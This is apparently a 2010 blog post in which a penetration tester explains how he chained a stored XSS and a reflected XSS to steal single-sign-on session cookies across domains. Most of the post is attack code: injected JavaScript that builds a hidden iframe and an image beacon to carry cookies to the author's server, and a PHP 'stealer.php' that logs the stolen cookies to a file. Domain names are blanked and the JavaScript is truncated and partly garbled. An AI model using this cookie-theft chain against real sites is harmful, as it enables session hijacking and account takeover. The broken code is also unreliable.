Monday, January 25, 2010

How to steal cross domain cookies via double XSS

During a pentest to a big company using SSO (single-sign-on) system I found a stored xss in one of their site, call it "". This site unfortunately doesn't partecipate in the SSO login system, so I had to devise a way to use it to steal the cookies from one of the SSO domains. After some tests I found that "" (one of the SSO domains) was vulnerable to reflected xss, so by injecting an iframe in that as a source was calling the vulnerable "" url that in turn was loading an image that as a source was calling my server I managed to steal sso authenticated cookies. Let's see some code: (the code is taking advantage of jquery.js since it was originally loaded by The following code is an external js injected in the stored xss vulnerable parameter in ""

$(document).ready(function() {
var el = document.createElement("iframe");
el.setAttribute('id', 'ifrm');
el.setAttribute('heigth', '0');
el.setAttribute('width', '0');"hidden";
el.setAttribute('src', url);


where ex.js is:

var Image = document.createElement("img");
and stealer.php code is:

$cookie = $_GET["c"];
echo $cookie;
$file = fopen("cookielog.txt", "a")
or die("Cannot open it");
fwrite($file, $cookie . "\n\n");
Finally by visiting while being logged to any of the SSO domains causes your credentials being sent to my server